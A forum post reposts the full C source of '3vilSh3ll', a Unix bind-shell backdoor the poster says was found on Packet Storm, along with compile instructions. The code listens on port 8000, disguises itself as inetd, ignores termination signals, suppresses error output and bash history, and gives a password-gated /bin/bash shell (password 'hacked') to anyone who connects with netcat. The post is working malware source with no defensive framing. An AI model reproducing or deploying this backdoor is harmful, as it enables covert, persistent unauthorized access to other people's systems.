As you can see, not coded by me. *nix shell, found on packet storm.
Code:
/*
------------------------------------
- BACKDOOR BIND CONNECT -
------------------------------------
Author info :
Code : Simpp
Contact : somebody
For : # Bad Digites Team #
Link : http://www.magichack.powa.fr/board
Why : Just for fun
Programm's info :
name :
3vilSh3ll
Compile :
gcc -g -W -Wall -Wextra -o backdoor 3vilSh3ll.c
client :
Netcat
description :
Simple backdoor bind connect .
change the name procecus for hide the command ps .
ignore signal SIGTERM SIGINT SIGQUIT for don't stop the backdoor .
redirect stderr in /dev/null for discret .
create procecus child for execute the evil code .
need passwd for connect backdoor .
redirect bash history (HISTFILE) in /dev/null for the new shell .
redirect stdout , stdin in socket client .
*/
/**** header ****/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
/**** config ****/
#define HIDE "/usr/sbin/inetd"
#define PORT 8000
#define ACL "\n\tBind Banckdoor by Simpp\n\tFor : # Bad Digites Team #\n\nPasswd : "
#define MAGIC_OK "Passwd accpet connect ...\n"
#define MAGIC_NO "Passwd error connect failed ...\n"
#define MAGIC_KEY "hacked"
#define NULL_LOG "/dev/null"
#define VAR "HISTFILE=/dev/null"
#define CMD "/bin/bash"
/**** structure socket ****/
typedef struct _socket_client_s {
int socket_cli;
struct sockaddr_in from;
socklen_t fromlen;
} socket_client_t;
typedef struct _socket_server_s {
int socket_serv;
struct sockaddr_in addr;
} socket_server_t;
/**** prototype fonction socket server ****/
int socket_server_new(socket_server_t *server);
int socket_server_bind(socket_server_t *server);
int socket_server_listen(socket_server_t *server);
int socket_server_accept_client(socket_server_t *server, socket_client_t *client);
void socket_server_free(socket_server_t *server);
/**** prototype fonction socket client ****/
int socket_client_send(int socket_cli, const char *txt);
int socket_client_recv(int socket_cli, char **buff);
int socket_client_connect_dup2(int socket);
void socket_client_free(socket_client_t *client);
/**** prototype fonction else ;) ****/
void hidden_process(char *argv[]);
void ignore_signal(void);
void clean_log(void);
int redirect_bash_history(void);
int child(void);
void client_fonction(socket_server_t *server);
int check_client(int socket_cli);
int check_passwd(char *pass);
/**** main programm's ****/
int main(int argc, char *argv[])
{
(void) argc;
(void) argv;
pid_t pid;
hidden_process(argv);
clean_log();
ignore_signal();
pid = fork();
if ( pid == -1 ) {
printf("fork() failed\n");
return EXIT_FAILURE;
}
if ( pid )
exit(0);
if ( !pid ) {
if ( child() == -1 )
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
/**** fonction socket server ****/
int
socket_server_new(socket_server_t *server)
{
server->socket_serv = socket(AF_INET, SOCK_STREAM, 0);
if ( server->socket_serv == -1 )
return -1;
server->addr.sin_family = AF_INET;
server->addr.sin_port = htons(PORT);
server->addr.sin_addr.s_addr = INADDR_ANY;
return 0;
}
int
socket_server_bind(socket_server_t *server)
{
int ret;
ret = bind(server->socket_serv, (struct sockaddr *)&server->addr, sizeof(server->addr));
if ( ret == -1 )
return -1;
return 0;
}
int
socket_server_listen(socket_server_t *server)
{
int ret;
ret = listen(server->socket_serv, 10000);
if ( ret == -1 )
return -1;
return 0;
}
int
socket_server_accept_client(socket_server_t *server, socket_client_t *client)
{
client->fromlen = sizeof(struct sockaddr);
client->socket_cli = accept(server->socket_serv, (struct sockaddr *)&client->from, &client->fromlen);
if ( client->socket_cli == -1 )
return -1;
return 0;
}
void
socket_server_free(socket_server_t *server)
{
if ( server != NULL ) {
if ( server->socket_serv != -1 )
close(server->socket_serv);
free(server);
server = NULL;
}
}
/*************************************************************/
/**** fonction socket client ****/
int
socket_client_send(int socket_cli, const char *txt)
{
int ret;
ret = write(socket_cli, txt , strlen(txt));
if ( ret == -1 )
return -1;
return 0;
}
int
socket_client_recv(int socket_cli, char **buff)
{
int ret;
memset(*buff, 0, 50);
ret = read(socket_cli, *buff, 50);
if ( ret == -1 )
return -1;
return 0;
}
int
socket_client_connect_dup2(int socket)
{
int ret1, ret2;
close(0);
close(1);
ret1 = dup2(socket, 0);
ret2 = dup2(socket, 1);
if ( ret1 == -1 || ret2 == -1 )
return -1;
return 0;
}
void
socket_client_free(socket_client_t *client)
{
if ( client != NULL ) {
if ( client->socket_cli != -1 )
close(client->socket_cli);
free(client);
client = NULL;
}
}
/*************************************************************/
/**** fonction else ****/
void
hidden_process(char *argv[])
{
strcpy(argv[0], HIDE);
}
void
clean_log(void)
{
int log;
close(2);
close(3);
log = open(NULL_LOG, O_WRONLY);
dup2(log, 2);
dup2(log, 3);
close(log);
}
void
ignore_signal(void)
{
signal(SIGQUIT, SIG_IGN);
signal(SIGTERM, SIG_IGN);
signal(SIGINT, SIG_IGN);
}
int
redirect_bash_history(void)
{
if ( putenv(VAR) == -1 )
return -1;
return 0;
}
int
child(void)
{
socket_server_t *server = malloc(sizeof(socket_server_t));
if ( server == NULL ) {
printf("malloc *server failed\n");
return -1;
}
if ( socket_server_new(server) == -1 ) {
printf("create new socket server failed\n");
return -1;
}
if ( socket_server_bind(server) == -1 ) {
printf("socket server bind failed\n");
return -1;
}
if ( socket_server_listen(server) == -1 ) {
printf("socket sever listen failed\n");
return -1;
}
if ( redirect_bash_history() == -1 )
printf("redirect HISTFILE on /dev/null failed\n");
while ( 1 ) {
client_fonction(server);
}
socket_server_free(server);
}
void
client_fonction(socket_server_t *server)
{
socket_client_t *client = malloc(sizeof(socket_client_t));
if ( client == NULL )
return;
if ( socket_server_accept_client(server, client) != -1 ) {
if ( check_client(client->socket_cli) != -1 ) {
if ( socket_client_connect_dup2(client->socket_cli) != -1 ) {
system(CMD);
}
}
}
socket_client_free(client);
}
int
check_client(int socket_cli)
{
char *passwd = malloc(50 * sizeof(char));
if ( passwd == NULL )
return -1;
if ( socket_client_send(socket_cli, ACL) == -1 )
return -1;
if ( socket_client_recv(socket_cli, &passwd) == -1 )
return -1;
if ( check_passwd(passwd) == -1 ) {
if ( socket_client_send(socket_cli, MAGIC_NO) == -1 )
return -1;
return -1;
}
else {
if ( socket_client_send(socket_cli, MAGIC_OK) == -1 )
return -1;
}
free(passwd);
passwd = NULL;
return 0;
}
int
check_passwd(char *pass)
{
char *buff = NULL;
buff = strtok(pass, "\n");
if ( !strcmp(MAGIC_KEY, buff) )
return 0;
else
return -1;
}
/*************************************************************/
/*####################### END #######################*/
![[Image: pgsig copy.png]](http://projectghostt.com/images/pgsig copy.png)